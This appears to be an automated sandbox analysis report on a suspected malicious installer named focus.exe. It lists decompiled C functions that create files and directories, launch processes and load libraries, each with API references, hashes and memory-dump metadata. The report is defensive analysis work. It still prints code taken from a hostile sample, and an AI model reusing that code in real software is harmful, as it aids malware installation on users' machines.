Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\focus.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4069982524
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\RadioBOSSAssembly,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\RadioBOSSAssembly
API String ID: 1892508949-3552626549
Opcode ID: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
Opcode Fuzzy Hash: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040579f
0x004057bf
0x004057c7
0x004057cc
0x00000000
0x004057d2
0x004057d6

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
CloseHandle.KERNEL32(?), ref: 004057CC

Strings

Error launching installer, xrefs: 004057A9

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D

Uniqueness

Uniqueness Score: -1.00%

Function 004052F0, Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E004052F0(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x42f468;
				_t10 =  *0x42f46c;
				__imp__OleInitialize(0);
				 *0x42f4f8 =  *0x42f4f8 | __eax;
				E004041C7(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x418;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x42f4cc =  *0x42f4cc + 1;
				}
				L7:
				E004041C7(0x404); // executed
				__imp__OleUninitialize(); // executed
				return  *0x42f4cc;
			}

0x004052f1
0x004052f8
0x00405300
0x00405306
0x0040530e
0x00405315
0x00405317
0x0040531a
0x0040531a
0x0040531f
0x00000000
0x00000000
0x00405330
0x00405338
0x00000000
0x00000000
0x0040533a
0x00000000
0x00405338
0x0040533c
0x0040533c
0x00405342
0x00405347
0x0040534c
0x00405359

APIs

OleInitialize.OLE32(00000000), ref: 00405300

Part of subcall function 004041C7: SendMessageA.USER32(00050242,00000000,00000000,00000000), ref: 004041D9

OleUninitialize.OLE32(00000404,00000000), ref: 0040534C

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 27348f06ce87f1f66077e23d5001c35af5604e3d0fe1afc9f40ed646d81b47df
Instruction ID: d823475d3c08908343a682022f3e0037ab1e92dd3cc8d49a61ca0bec2af1321f
Opcode Fuzzy Hash: 27348f06ce87f1f66077e23d5001c35af5604e3d0fe1afc9f40ed646d81b47df
Instruction Fuzzy Hash: 75F090766006018AE3616B549D05B577370DFA0341F95413BFF48B32E0D6F5584A8E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406508
0x0040650b
0x00406512
0x0040651a
0x00406526
0x00000000
0x0040652d
0x0040651d
0x00406524
0x00000000
0x00406535
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405c94
0x00405ca1
0x00405cb6
0x00405cbc

APIs

GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\focus.exe,80000000,00000003), ref: 00405C94
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405767
0x0040576f
0x00000000
0x00405775
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405d0c
0x00405d1c
0x00405d24
0x00000000
0x00405d2b
0x00000000
0x00405d2d

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405d3b
0x00405d4b
0x00405d53
0x00000000
0x00405d5a
0x00000000
0x00405d5c

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004041C7, Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041C7(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x42ebf8; // 0x50242
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004041c7
0x004041ce
0x004041d9
0x00000000
0x004041d9
0x004041df

APIs

SendMessageA.USER32(00050242,00000000,00000000,00000000), ref: 004041D9

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
Instruction ID: 4f5bfb943ccb7372f266285400f959559a3f08b639bcfa815988f1d16fb7a589
Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
Instruction Fuzzy Hash: A5C09BB17447017FEE20CB659D49F0777586750700F2544397755F60D4C674E461D61C

Uniqueness

Uniqueness Score: -1.00%

Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040330e
0x00403314

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 004041B0, Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041B0(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42f428, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004041be
0x004041c4

APIs

SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040419D, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040419D(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42a88c, _a4); // executed
				return _t2;
			}

0x004041a7
0x004041ad

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F79), ref: 004041A7

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
